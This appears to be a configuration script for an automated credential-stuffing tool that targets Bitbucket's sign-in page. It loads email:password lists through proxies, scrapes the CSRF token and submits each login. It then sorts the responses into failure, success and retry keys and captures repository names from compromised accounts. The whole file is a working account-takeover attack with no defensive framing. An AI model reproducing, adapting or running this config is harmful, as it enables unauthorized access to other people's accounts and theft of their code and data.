[SETTINGS]
{
  "Name": "Bitbucket(Capture)",
  "SuggestedBots": 100,
  "LastModified": "2018-07-02T00:37:20.6217545+00:00",
  "AdditionalInfo": "",
  "Author": "MaStErChO & Secant(base)",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#Get_Login REQUEST GET "https://bitbucket.org/account/signin/" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://bitbucket.org/account/signin/" 
  HEADER "origin: https://bitbucket.org" 
  HEADER ":authority:: bitbucket.org" 
  HEADER ":method:: GET" 
  HEADER ":path:: /account/signin/" 
  HEADER ":scheme:: https" 
#PARSE_crsfmidToken PARSE "<SOURCE>" CSS "[name=csrfmiddlewaretoken]" "value" 0 -> VAR "TOKEN" "" "" 
#POST_Login REQUEST POST "https://bitbucket.org/account/signin/" AutoRedirect=TRUE 
  CONTENT "next=&csrfmiddlewaretoken=<TOKEN>&username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://bitbucket.org/account/signin/" 
  HEADER "origin: https://bitbucket.org" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "The email address or password you entered is incorrect" 
    KEY "Almost done" 
    KEY "Your account is currently inactive" 
    KEY "Please wait" 
    KEY "You can no longer log in with a username" 
    KEY "Your account has been deactivated" 
    KEY "You can no longer log in with an email alias" 
    KEY "We logged you out because we&#39;re about to update your account" 
    KEY "<title>OpenID transaction in progress</title>" 
    KEY "This field is required" 
    KEY "You must reset your Atlassian account password before you can log in" 
  KEYCHAIN Success OR 
    KEY "repository" 
    KEY "<RESPONSECODE>" Contains "302" 
  KEYCHAIN Retry OR 
    KEY "CSRF verification failed. Request aborted" 
  KEYCHAIN CUSTOM "FREE" AND 
    KEY "Soon you'll be able to log in to any Atlassian Cloud app using an Atlassian account" 
    KEY ">Logout<" 
#PARSE_Repo PARSE "<SOURCE>" LR "\"has_wiki\": false, \"name\": \"" "\", \"links\": {\"clone\": [{\"href\":" Recursive=TRUE -> CAP "REPO" "" "" 
#PARSE_Repo1 PARSE "<SOURCE>" LR "\"has_wiki\": true, \"name\": \"" "\", \"links\": {\"clone\": [{\"href\":" Recursive=TRUE -> CAP "REPO1" "" "" 
